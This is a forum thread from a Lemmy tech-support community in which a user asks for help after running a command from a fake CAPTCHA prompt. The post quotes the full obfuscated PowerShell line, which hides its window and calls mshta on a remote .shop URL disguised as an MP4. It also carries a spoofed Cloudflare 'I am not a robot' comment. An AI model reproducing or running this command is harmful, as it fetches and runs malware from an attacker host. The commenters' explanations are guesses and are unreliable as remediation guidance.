this post was submitted on 02 Apr 2025
7 points (76.9% liked)

techsupport

2719 readers
21 users here now

The Lemmy community will help you with your tech problems and questions about anything here. Do not be shy, we will try to help you.

If something works or if you find a solution to your problem let us know it will be greatly apreciated.

Rules: instance rules + stay on topic

Partnered communities:

You Should Know

Reddit

Software gore

Recommendations

founded 2 years ago
MODERATORS
[email protected]
7
Help! I was hit with a fake Captcha attack (lemm.ee)
submitted 1 day ago by [email protected] to c/[email protected]
10 comments fedilink hide all child comments
 

I accidentally executed

POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S*2\\\\\\\\\\\m*ht*e https://mnjk-jk.bsdfg-zmp-q-n.shop/1.mp4 # ✅ ''Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 715921''

via Windows Run a couple of days ago. Realized what I had done today after seeing a post on it.

What should I do? is full system wipe necessary? or can I remove it somehow?

If I need to do a system format what about attached drives and other devices on the network?

you are viewing a single comment's thread
view the rest of the comments
[–] [email protected] 4 points 1 day ago (1 children)

What is that supposed to do?

[–] [email protected] 1 points 1 day ago (1 children)

I'm not too sure. I think -w runs powershell silently?! I'm hoping someone can figure out the rest.

[–] [email protected] 2 points 1 day ago (1 children)

well thats the neat part, the url it presumably downloads and executes the first payload from has died so no unless you catch it when its live you can't easily replicate what happended on your computer anywhere else i have no clue what the powershell is doing but hiding malware in a weird file or pretending its a different file type and then executing that file isn't uncommon

[–] [email protected] 2 points 1 day ago

This example is likely an HTA polyglot. An actual MP4 is merged with a binary, basically. The MP4 will play as normal, but the powershell is responsible for execution of the malware.